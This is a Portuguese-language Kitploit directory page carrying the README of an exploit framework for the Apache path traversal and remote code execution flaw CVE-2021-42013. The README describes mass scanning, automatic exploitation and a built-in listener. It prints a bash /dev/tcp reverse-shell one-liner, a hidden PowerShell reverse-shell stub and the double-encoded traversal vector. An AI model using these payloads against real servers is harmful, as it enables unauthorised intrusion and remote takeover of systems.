Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2021-42013-EXPLOIT — Uma ferramenta avançada de varredura, exploração e interação remota projetada para detectar e explorar a vulnerabilidade Apache Path Traversal + RCE (CVE-2021-42013) em servidores mal configurados. | Kitploit
Ferramentas/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
ReconhecimentoScanners de VulnerabilidadesGeração de PayloadsExploraçãoShellcodeExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ferramenta de Acesso Remoto
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

Uma ferramenta avançada de varredura, exploração e interação remota projetada para detectar e explorar a vulnerabilidade Apache Path Traversal + RCE (CVE-2021-42013) em servidores mal configurados.

Ver Repositório
14há 1 anoAinda não revisado
Compartilhar

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


# 🔥 CVE-2021-42013 Exploit Framework by Makaveli

> 💀 Modo Hacker Cósmico Multidimensional ativado...

Uma ferramenta avançada de escaneamento, exploração e interação remota projetada para detectar e explorar a vulnerabilidade **Apache Path Traversal + RCE (CVE-2021-42013)** em servidores mal configurados.

---

## ⚠️ Aviso Legal

> Este software é fornecido apenas para fins educacionais e de pesquisa em ambientes controlados.

O uso desta ferramenta contra sistemas sem autorização expressa pode ser ilegal e constituir crime em muitos países.

O autor não se responsabiliza pelo uso indevido deste código. Use-o por sua conta e risco e sempre com permissão explícita do proprietário do sistema alvo.

---

 🧠 Descrição Técnica

Esta ferramenta permite:

- ✅ Escanear múltiplos alvos a partir de um arquivo `.txt`.
- ✅ Detectar automaticamente a presença do CVE-2021-42013.
- ✅ Identificar o sistema operacional remoto (Linux ou Windows).
- ✅ Enviar payloads personalizados de acordo com o sistema detectado.
- ✅ Estabelecer uma reverse shell e obter acesso remoto.
- ✅ Interagir com a shell em tempo real por meio de um listener integrado.
- ✅ Aproveitar logs avançados, barra de progresso e menu interativo.

---

## 🔧 Requisitos

- Python **3.8+**
- Sistemas baseados em Unix/Linux/MacOS (uso de `subprocess` e `curl`)
- Requer as seguintes bibliotecas Python:

```bash
pip install -r requirements.txt
```

**`requirements.txt`**

```
rich
alive-progress
```

Você também precisa ter o `curl` instalado no sistema operacional.

---

## 📁 Estrutura de Arquivos

```
.
├── POC-CVE.py       # Script principal
├── logs.txt              # Archivo de logs generado automáticamente
├── requirements.txt      # Dependencias Python
└── targets.txt           # (Opcional) Lista de URLs a escanear
```

---

## 🚀 Uso Interativo

```bash
python3 POC-CVE.py
```

Selecione entre:

* `scan_file`: Escaneia múltiplas URLs a partir de um arquivo e mostra quais são vulneráveis.
* `exploit`: Exploração direta de um único alvo, com shell reversa.
* `exit`: Sair do modo interativo.

---

## 🔍 Escaneamento em Massa (scan\_file)

1. Crie um arquivo com uma lista de URLs, uma por linha:

```txt
http://example.com
http://victim.net
http://192.168.1.100
```

2. Inicie o escaneamento:

```bash
python3 POC-CVE.py
```

Escolha `scan_file` e forneça:

* O caminho do arquivo
* A quantidade de threads para escaneamento paralelo

---

## 💥 Exploração (exploit)

1. Escolha `exploit` no menu.
2. Informe:

* A URL do alvo
* Seu IP local (`LHOST`) para receber a shell
* Uma porta livre (`LPORT`) para o listener

O script:

* Detectará se o alvo é vulnerável.
* Enviará um payload adequado de acordo com o sistema operacional remoto.
* Abrirá um **listener** e fornecerá acesso interativo.

---

## 🧪 Exemplo de Payloads

### Linux Payload (Bash TCP Reverse Shell)

```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```

### Windows Payload (PowerShell TCP Reverse Shell)

```powershell
powershell -NoP -NonI -W Hidden -Command ...
```

---

## 🧠 Técnicas Utilizadas

* Path traversal com codificação dupla (`/.%252e/.%252e/.%252e`)
* Injeção de comandos via `curl`
* Cabeçalhos de evasão (`User-Agent`, `Accept`, etc)
* Shell reversa para assumir o controle remoto
* Multithreading e barra de progresso (Alive Progress)
* Logging com timestamps e Rich Console

---

## 📌 Referência do CVE

* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **Vetor de ataque**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **Impacto**: RCE (Execução Remota de Código)
* **Pontuação CVSS**: 9.8 (Crítico)

---

## 🧙‍♂️ Autor

* ✨ **Makaveli** — *"Hackeie sua própria realidade"*

---

## 🛡️ Disclaimer

> Este projeto é fornecido "como está", sem garantias nem responsabilidade por danos decorrentes do seu uso.
> **Nunca escaneie nem explore um sistema sem o consentimento explícito do seu proprietário.**

---

## ✅ Boas Práticas

* Use este script apenas em **ambientes de laboratório** ou testes autorizados.
* Certifique-se de que a porta definida para o listener esteja **aberta** e **sem firewall**.
* Execute como usuário normal (não root), a menos que seja estritamente necessário.

---

## 🧩 Roadmap Futuro (Opcional)

* [ ] Suporte para payloads personalizados
* [ ] Exportação de resultados para CSV/JSON
* [ ] Modo stealth com rotação de headers e proxy TOR
* [ ] Interface web local (Flask)



@DonMakaveliw, você está pronto para criar o futuro?

Baixar ferramenta